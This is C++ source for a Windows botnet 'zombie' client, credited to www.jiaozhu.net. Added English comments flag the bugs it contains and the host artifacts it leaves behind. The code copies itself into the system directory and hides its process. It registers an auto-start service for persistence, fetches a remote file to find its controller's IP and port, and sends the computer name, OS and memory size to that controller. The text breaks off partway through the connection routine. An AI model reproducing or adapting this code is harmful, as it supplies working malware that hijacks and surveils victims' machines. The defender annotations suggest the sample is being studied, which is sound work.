// HDService.cpp : Defines the entry point for the console application.
//
//网络僵尸服务端代码 作者:教主 www.jiaozhu.net
//请保留作者版权
#include "stdafx.h"
#include "HDService.h"
#include "winsock2.h"
#include "winsvc.h"
#include "windows.h"
#include "afxinet.h"
#include "HideProcess.h"
//#include "shellapi.h"
// Custom window-message id; not referenced in the lines of this file shown here
// (the macro body is unparenthesised: WM_USER+1000).
#define WM_SOCKET WM_USER+1000
// Constant; not referenced in the lines shown here. A fixed literal like this is
// usable as a static signature for the sample.
#define SEQ 0x28376839
// Per the author's comment: starting value of the spoofed IP, and the spoofed
// range spans a class-B network. Not referenced in the lines shown here.
#define FAKE_IP "10.156.124.1"
// Name (and display name) under which the binary registers itself with the SCM
// in InstallService(), and the entry name handed to StartServiceCtrlDispatcher in
// WinMain(). A service of this name on a host is an indicator of this sample.
#define ServiceName "www.jiaozhu.net"
// MFC debug-build boilerplate: route `new` through DEBUG_NEW so leak reports
// carry the file name.
#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif
/////////////////////////////////////////////////////////////////////////////
// The one and only application object
CWinApp theApp;
// File-scope using-directive (this is a .cpp, so it stays local to this TU).
using namespace std;
// Status record reported to the SCM; written by ServiceMain() and Handler().
SERVICE_STATUS service_status_ss;
// Handle returned by RegisterServiceCtrlHandler in ServiceMain(); passed to every
// SetServiceStatus call.
SERVICE_STATUS_HANDLE handle_service_status;
// SCM handle and service handle, shared by InstallService()/UninstallService().
SC_HANDLE scm,svc;
// TCP socket to the remote host; created and connected in start().
SOCKET sock_client;
// Copy of the host-information line that start() builds in SendBuff.
char systeminfor[256];
// Not referenced in the lines shown here.
HANDLE ghThread;
// Hidden top-level window created in start() (class "HDService", title "HDos").
HWND hWnd;
// TRUE on NT-family Windows (set in WinMain() from GetVersion); selects the
// service path versus the Win9x path.
BOOL gbIsNT;
// "ip file": URL of the remote file that start() fetches (via GetHttpFile) to
// obtain the address and port to connect to. Presumably filled by Readme(),
// which is defined elsewhere — not visible here.
char ipfile[256];
// Executable file name under which WinMain() copies this binary into the system
// directory and under which InstallService() registers the service.
char installname[256];
// Process entry point. What the visible code does, in order:
//   1. Readme() — defined elsewhere; presumably populates ipfile/installname
//      (not visible here, confirm against its definition).
//   2. If the current directory is not the system directory: copy this
//      executable to <system dir>\<installname>, call uninstall() (defined
//      elsewhere; distinct from UninstallService() below), launch the copy with
//      the system directory as its working directory, and exit.
//   3. Otherwise detect the platform. Win9x: per the author's comment, hide the
//      process via KERNEL32!RegisterServiceProcess and run start() directly.
//      NT: call HideProcess() and hand control to the SCM dispatcher; if that
//      fails (the process was not started by the SCM), call InstallService().
// Defender notes: the file copy in the system directory, the child process
// started from there, and the service named ServiceName are the host artifacts
// this stage leaves. hInstance/hPrevInstance/lpCmdLine/nCmdShow are unused;
// the return value is always 0 unless the CopyFile at step 2 fails (-1).
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
Readme(); // defined elsewhere; presumably fills ipfile and installname — not shown here
//::MessageBox(NULL,ipfile,NULL,MB_OK);
//::MessageBox(NULL,installname,NULL,MB_OK);
//Readme();
//return -1;
//UninstallService();
//return -1;
int nRetCode = 0;
gbIsNT=FALSE;
//****************************************// self-install / relocation stage (author's label: "self-delete")
char CurrDirBuff[256];
char SysDirBuff[256];
int DirLen=sizeof(CurrDirBuff);
::GetCurrentDirectory(DirLen,CurrDirBuff);
::GetSystemDirectory(SysDirBuff,sizeof(SysDirBuff));
//SaveLogToFile("out");
// Case-insensitive compare: only proceed to the copy-and-relaunch branch when
// not already running from the system directory.
if (_stricmp(CurrDirBuff,SysDirBuff)!=0)
{
//SaveLogToFile("in");
//::MessageBox(NULL,"winmain",NULL,MB_OK);
char filename[256];
char This_File[MAX_PATH];
// Destination: <system dir>\<installname>; no length check on the concatenation.
strcpy(filename,SysDirBuff);
strcat(filename,"\\");
strcat(filename,installname);
memset(This_File,0,sizeof(This_File));
// Path of the currently running image.
GetModuleFileName(NULL, This_File, sizeof(This_File));
// bFailIfExists=FALSE: an existing copy is overwritten. Failure aborts with -1.
if(::CopyFile(This_File,filename,FALSE)==0) return -1;
PROCESS_INFORMATION pinfo;
STARTUPINFO sinfo;
memset(&pinfo,0,sizeof(pinfo));
memset(&sinfo,0,sizeof(sinfo)); // note: sinfo.cb is left at 0
//SaveLogToFile("uninstall()");
uninstall(); // defined elsewhere — not the UninstallService() in this file
//ShellExecute(NULL,"open",filename,NULL,SysDirBuff,SW_HIDE);
// Launch the copy from the system directory (handles inheritable, no creation
// flags); the return value is not checked.
CreateProcess(filename,NULL, NULL, NULL,TRUE,0, NULL,SysDirBuff, &sinfo, &pinfo);
//SaveLogToFile("CreateProcess()");
// The original (non-system-directory) instance terminates here.
ExitProcess(0);
}
//******************************// create mutex object (disabled)
//HANDLE hMutex=::CreateMutex(NULL,FALSE,"HDServer");
//if (GetLastError() == ERROR_ALREADY_EXISTS) return -1;
//******************************// determine the operating-system type
DWORD dwVersion=::GetVersion();
// Obtain the OS version number
// High bit set => Win9x (not Windows NT)
if(dwVersion >= 0x80000000)
// The OS is Win9x, not WinNT
{
typedef DWORD(CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
// Prototype of RegisterServiceProcess()
HINSTANCE hDLL;
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
hDLL=LoadLibrary("KERNEL32");
// Load KERNEL32.DLL, which exports RegisterServiceProcess()
lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");
// Resolve the address of RegisterServiceProcess(); neither hDLL nor the
// resolved pointer is NULL-checked before use.
lpRegisterServiceProcess(GetCurrentProcessId(),1);
// Call RegisterServiceProcess() to hide this process (author's comment)
FreeLibrary(hDLL);
// Unload the DLL
}else
{
gbIsNT=TRUE;
}
if (gbIsNT)
{
// Hide the process (HideProcess() is declared in HideProcess.h; not shown here)
HideProcess();
/*******************************************/
// Service dispatch table
SERVICE_TABLE_ENTRY service_tab_entry[2];
service_tab_entry[0].lpServiceName=ServiceName; // service name
service_tab_entry[0].lpServiceProc=ServiceMain; // service entry point
// The table may hold several entries; the last one must be NULL
service_tab_entry[1].lpServiceName=NULL;
service_tab_entry[1].lpServiceProc=NULL;
// Returns 0 when the process was not started by the SCM (e.g. run
// interactively); in that case the binary registers itself as a service.
if (StartServiceCtrlDispatcher(service_tab_entry)==0)
{
//int i=::GetLastError();
//char aa[3];
//::MessageBox(NULL,itoa(i,aa,10),NULL,MB_OK);
InstallService();
}
}
else
{
// Win9x: no SCM, run the network stage directly.
start();
}
return nRetCode;
}
/***********************************************/
//服务的真正入口点函数
// Service entry point, invoked by the SCM dispatcher set up in WinMain().
// Fills the global service_status_ss, registers Handler() as the control
// handler, reports SERVICE_RUNNING and then calls start() (the network stage).
// dwArgc/lpszArgv are not used.
// Notes: the SERVICE_START_PENDING state set first is never reported — it is
// overwritten with SERVICE_RUNNING before the only SetServiceStatus call. The
// failure branch of RegisterServiceCtrlHandler is empty (its MessageBox is
// commented out), so SetServiceStatus is still called with a NULL handle on
// failure.
void WINAPI ServiceMain(DWORD dwArgc,LPTSTR *lpszArgv)
{
service_status_ss.dwServiceType=SERVICE_WIN32;
service_status_ss.dwCurrentState=SERVICE_START_PENDING;
// Accepts stop and pause/continue controls; see Handler().
service_status_ss.dwControlsAccepted=SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_PAUSE_CONTINUE;
service_status_ss.dwServiceSpecificExitCode=0;
service_status_ss.dwWaitHint=0;
service_status_ss.dwCheckPoint=0;
service_status_ss.dwWin32ExitCode=0;
if ((handle_service_status=RegisterServiceCtrlHandler(ServiceName,Handler))==0)
{
//::MessageBox(NULL,"RegisterServiceCtrlHandler error",NULL,MB_OK);
}// one control handler per service
service_status_ss.dwCurrentState=SERVICE_RUNNING;
service_status_ss.dwWaitHint=0;
service_status_ss.dwCheckPoint=0;
::SetServiceStatus(handle_service_status,&service_status_ss);
//::MessageBox(NULL,"start","tell",MB_OK);
// Runs the hidden window / network logic on the SCM's thread.
start();
return ;
}
/***********************************************/
//服务控制器
// Service control handler registered in ServiceMain(). Maps STOP/CONTINUE/PAUSE
// to the corresponding state in the global service_status_ss and reports it via
// handle_service_status. As in the original, a state-changing control reports
// twice (once in the branch, once at the end); INTERROGATE and unknown codes
// re-report the current state once without modifying it.
void WINAPI Handler(DWORD dwControl)
{
bool changed = true;
DWORD next_state = service_status_ss.dwCurrentState;
if (dwControl == SERVICE_CONTROL_STOP)
next_state = SERVICE_STOPPED;
else if (dwControl == SERVICE_CONTROL_CONTINUE)
next_state = SERVICE_RUNNING;
else if (dwControl == SERVICE_CONTROL_PAUSE)
next_state = SERVICE_PAUSED;
else
changed = false; // SERVICE_CONTROL_INTERROGATE and anything unrecognised
if (changed)
{
service_status_ss.dwCurrentState = next_state;
::SetServiceStatus(handle_service_status, &service_status_ss);
}
// Unconditional report, matching the original's call after the switch.
::SetServiceStatus(handle_service_status, &service_status_ss);
}
/***********************************************/
// Registers this binary as a Win32 service and starts it. The binary path is
// <system dir>\<installname>, i.e. the copy made in WinMain(). Service name and
// display name are both ServiceName; the service is auto-start, runs in its own
// process with SERVICE_INTERACTIVE_PROCESS, and uses SERVICE_ERROR_IGNORE.
// scm and svc are the file-level globals. No return value; all API failures are
// silently ignored.
// Defender note: an auto-start service named ServiceName whose binary path
// points into the system directory is the persistence artifact left here.
void InstallService()
{
char szSysDir[256];
memset(szSysDir,0,sizeof(szSysDir));
::GetSystemDirectory(szSysDir,sizeof(szSysDir));
// No length check on the concatenation.
strcat(szSysDir,"\\");
strcat(szSysDir,installname);
scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if (scm!=NULL)
{
// CreateService's result is not checked; its handle is overwritten by the
// OpenService below without being closed.
svc=::CreateService(scm,ServiceName,ServiceName,SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,
SERVICE_AUTO_START,SERVICE_ERROR_IGNORE,szSysDir,NULL,NULL,NULL,NULL,NULL);
// Re-open with only SERVICE_START rights, then start it immediately.
svc=::OpenService(scm,ServiceName,SERVICE_START);
if (svc!=NULL)
{
::StartService(svc,0,NULL);
::CloseServiceHandle(svc);
}
::CloseServiceHandle(scm);
}
}
/***********************************************/
// Removes the service registered under ServiceName from the SCM. Uses the
// file-level globals scm and svc; each handle is closed only if it was opened.
// Failures of OpenSCManager/OpenService/DeleteService are silently ignored.
void UninstallService()
{
scm = ::OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
if (scm == NULL)
return;
svc = ::OpenService(scm, ServiceName, SERVICE_ALL_ACCESS);
if (svc != NULL)
{
::DeleteService(svc);
::CloseServiceHandle(svc);
}
::CloseServiceHandle(scm);
}
/************************************************/
int start()
{
int ErrorCode;
WSADATA WsaData;
struct sockaddr_in DestAddr; //上线地址结构
char url[256];
MSG msg;
WNDCLASS wndc;
LPSTR szAppName="HDService";
wndc.style=0;
wndc.lpfnWndProc=WndProc;
wndc.cbClsExtra=0;
wndc.cbWndExtra=0;
wndc.hInstance=NULL;
wndc.hIcon=LoadIcon(NULL,IDI_APPLICATION);
wndc.hCursor=LoadCursor(NULL,IDC_ARROW);
wndc.hbrBackground=(HBRUSH)(COLOR_WINDOW+1);
wndc.lpszMenuName=NULL;
wndc.lpszClassName=szAppName;
RegisterClass(&wndc);
hWnd=CreateWindow(szAppName,"HDos",
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT,CW_USEDEFAULT,
CW_USEDEFAULT,CW_USEDEFAULT,
NULL,NULL,NULL,NULL);
ShowWindow(hWnd,SW_HIDE);
UpdateWindow(hWnd);
//****************************************
memset(url,0,sizeof(url));
strcpy(url,strlwr(ipfile));
//::MessageBox(NULL,url,NULL,MB_OK);
//strcpy(url,"http://192.168.1.111/ip.jpg");
char html[256]; //获取的网页
char ClientIP[16]; //客户端ip
char ClientPort[5]; //客户端端口
char *point; //指针
char ComputerName[256]; //计算机名
char MemorySize[20]; //内存大小
char SendBuff[256]; //发送缓存
char OsName[64]; //操作系统类型
//******************************************
switch(GetOS())
{
case VER_PLATFORM_WIN32_WINDOWS:
lstrcpy(OsName,"Windows 9x");
RegMe();
break;
case VER_PLATFORM_WIN32_NT:
lstrcpy(OsName,"Windows NT/2000/XP");
break;
}
//******************************//取计算机名
memset(ComputerName,0,sizeof(ComputerName));
DWORD len=sizeof(ComputerName);
if ( !GetComputerName(ComputerName,&len)) return -1;
//******************************//取内存大小
MEMORYSTATUS mem;
mem.dwLength=sizeof(mem);
GlobalMemoryStatus(&mem);
memset(MemorySize,0,sizeof(MemorySize));
strcpy(MemorySize,itoa(mem.dwTotalPhys/1024/1024+2,MemorySize,10));
//******************************//获取网页内容
memset(html,0,sizeof(html));
strcpy(html,strlwr(GetHttpFile(url)));
//MessageBox(NULL,html,NULL,MB_OK);
//*****************************//获取客户端ip和端口
point=html;
if(strstr(html,"http://jiaozhu")!=NULL)
{
point=point+strlen("http://jiaozhu");
}
if(strstr(point,":")!=NULL)
{
memset(ClientIP,0,sizeof(ClientIP));
strncpy(ClientIP,point,strcspn(point,":"));
point=point+strcspn(point,":")+1;
if(strstr(point,"end")!=NULL)
{
memset(ClientPort,0,sizeof(ClientPort));
strncpy(ClientPort,point,strcspn(point,"end"));
}
}
//::MessageBox(NULL,ClientIP,NULL,MB_OK);
//::MessageBox(NULL,ClientPort,NULL,MB_OK);
//*************************************************
HANDLE hThread;
unsigned long uiThreadID=0;
CLIENTPARA *clientpa;
try
{
if((ErrorCode=WSAStartup(MAKEWORD(2,2),&WsaData))!=0)
{
return -1;
}
sock_client=::socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (sock_client==INVALID_SOCKET)
{
return -1;
}
//上线地址结构
memset(&DestAddr,0,sizeof(DestAddr));
DestAddr.sin_family=AF_INET;
DestAddr.sin_addr.s_addr=inet_addr(ClientIP);
DestAddr.sin_port=htons(atoi(ClientPort));
//while (1)
{
if(connect(sock_client,(sockaddr*)&DestAddr,sizeof(DestAddr))==SOCKET_ERROR )
{
Sleep(3000);
}
//连接上线
memset(SendBuff,0,sizeof(SendBuff));
strcat(SendBuff,"<CMD>000</CMD><CPNAME>");
strcat(SendBuff,ComputerName);
strcat(SendBuff,"</CPNAME><OSNAME>");
strcat(SendBuff,OsName);
strcat(SendBuff,"</OSNAME><MEM>");
strcat(SendBuff,MemorySize);
strcat(SendBuff,"</MEM>");
strcat(SendBuff,"\r\n");
memset(systeminfor,0,sizeof(systeminfor));
strcpy(systeminfor,SendBuff);
if (SOCKET_ERROR!=send(sock_client,SendBuff,sizeof(SendBuff),0))
{